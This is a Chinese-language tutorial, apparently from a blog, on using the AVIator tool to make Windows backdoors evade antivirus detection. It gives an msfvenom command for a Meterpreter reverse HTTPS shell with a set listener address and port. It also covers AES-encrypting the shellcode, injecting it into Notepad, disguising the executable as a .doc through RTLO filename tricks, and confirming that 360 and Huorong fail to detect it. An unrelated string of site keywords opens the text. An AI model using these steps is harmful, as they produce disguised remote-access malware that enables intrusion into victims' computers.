做网站都需要什么技术,网站设计作业平台,网站建设 大学生创业网,wordpress设置标题字体大小0x01 免杀能力一览表 几点说明#xff1a;
1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。
2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全…0x01 免杀能力一览表 几点说明
1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。
2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀的精确判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。
0x02 AVIator介绍
AVIator使用AES加密来加密Shellcode生成一个包含加密有效负载的可执行文件然后使用各种注入技术将shellcode解密并注入到目标系统从而绕过杀毒软件的检测。
0x03 安装AVIator
AVIator只有windows版c#开发单文件exe。
安装也非常方便直接从github上下载下来。 git clone https://github.com/Ch0pin/AVIator或者直接下载压缩包https://github.com/Ch0pin/AVIator/archive/master.zip 解压后在Compiled Binaries文件夹中有x86和x64的可执行exe文件执行即可 使用也非常简单只需要填入payload后简单设置一下就可以。
0x04 AVIator生成后门
首先要使用msf生成shellceode需要基于c#我就用msf生成一个最基础的 msfvenom -p windows/meterpreter/reverse_https LHOST10.211.55.2 LPORT3333 -f csharp -o test11.c在AVIator中对shellcode进行处理AES KEY和IV默认就可以
payload地方填入上面生成的test11.c文件内容然后点击Encrypt生成加密后的payload。 目标操作系统架构根据实际情况选择就可以x86比较通用一些。
下面还有个Injection Techniques需要选择注入技术我这选择第二个注入Notepad进程 另外软件还提供了RTLO选项可以使可执行文件名看起来伪装性更好。比如启用该选项后文件testcod.exe将被保存文件名为testexe.doc但文件还是可以正常被当做exe执行的。但是选择了RTLO选项虽然更迷惑人但也更容易被杀软报警告。
还可以自定义程序ico图标增强伪装我这就不配置了 点击generate后就可以生成后门程序了。 不开杀软的时候可正常上线 打开杀软进行测试可过360和火绒动静态检测 比较诡异的是360安全卫士的行为检测发现木马行为 但火绒和360杀毒没点反应可正常上线 后来我没启用RTLO选项又生成了一个正常的exe文件看来RTLO选项影响还挺大。
参考
官方说明文档https://github.com/Ch0pin/AVIator
